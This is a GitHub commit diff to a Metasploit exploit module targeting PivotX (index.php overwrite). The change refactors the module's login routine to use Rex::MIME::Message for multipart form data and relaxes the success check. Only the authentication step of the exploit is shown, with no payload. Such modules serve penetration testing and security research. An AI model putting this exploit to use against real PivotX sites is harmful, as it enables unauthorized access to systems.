Skip to content

Commit edfa84e

Browse files
msutovsky-r7msutovsky-r7
committed
Uses Rex::MIME::Message instead of manual form-data
1 parent 54c86cf commit edfa84e

File tree

1 file changed

+10
-20
lines changed

1 file changed

+10
-20
lines changed

modules/exploits/linux/http/pivotx_index_php_overwrite.rb

Lines changed: 10 additions & 20 deletions
Original file line numberDiff line numberDiff line change
@@ -75,32 +75,22 @@ def check
7575
end
7676

7777
def login
78-
boundary = Rex::Text.rand_text_alphanumeric(16).to_s
79-
80-
data_post = "------WebKitFormBoundary#{boundary}\r\n"
81-
data_post << "Content-Disposition: form-data; name=\"returnto\"\r\n\r\n"
82-
data_post << "\r\n"
83-
data_post << "------WebKitFormBoundary#{boundary}\r\n"
84-
data_post << "Content-Disposition: form-data; name=\"template\"\r\n\r\n"
85-
data_post << "\r\n"
86-
data_post << "------WebKitFormBoundary#{boundary}\r\n"
87-
data_post << "Content-Disposition: form-data; name=\"username\"\r\n\r\n"
88-
data_post << "#{datastore['USERNAME']}\r\n"
89-
data_post << "------WebKitFormBoundary#{boundary}\r\n"
90-
data_post << "Content-Disposition: form-data; name=\"password\"\r\n\r\n"
91-
data_post << "#{datastore['PASSWORD']}\r\n"
92-
data_post << "------WebKitFormBoundary#{boundary}\r\n"
93-
94-
res = send_request_cgi!({
78+
data_post = Rex::MIME::Message.new
79+
data_post.add_part('', nil, nil, %(form-data; name="returnto"))
80+
data_post.add_part('', nil, nil, %(form-data; name="template"))
81+
data_post.add_part(datastore['USERNAME'], nil, nil, %(form-data; name="username"))
82+
data_post.add_part(datastore['PASSWORD'], nil, nil, %(form-data; name="password"))
83+
84+
res = send_request_cgi({
9585
'method' => 'POST',
9686
'uri' => normalize_uri(target_uri.path, 'pivotx', 'index.php'),
9787
'vars_get' => { 'page' => 'login' },
98-
'ctype' => "multipart/form-data; boundary=----WebKitFormBoundary#{boundary}",
99-
'data' => data_post,
88+
'ctype' => "multipart/form-data; boundary=#{data_post.bound}",
89+
'data' => data_post.to_s,
10090
'keep_cookies' => true
10191
})
10292

103-
fail_with Failure::NoAccess, 'Login failed, probably incorrect credentials' unless res&.code == 200 && res.body.include?('Dashboard') && !res.body.include?('Incorrect username/password') && res.get_cookies =~ /pivotxsession=([a-zA-Z0-9]+);/
93+
fail_with Failure::NoAccess, 'Login failed, probably incorrect credentials' unless (res&.code == 200 || res&.code == 302) && res.get_cookies =~ /pivotxsession=([a-zA-Z0-9]+);/
10494

10595
@csrf_token = Regexp.last_match(1)
10696
end

0 commit comments

Comments
 (0)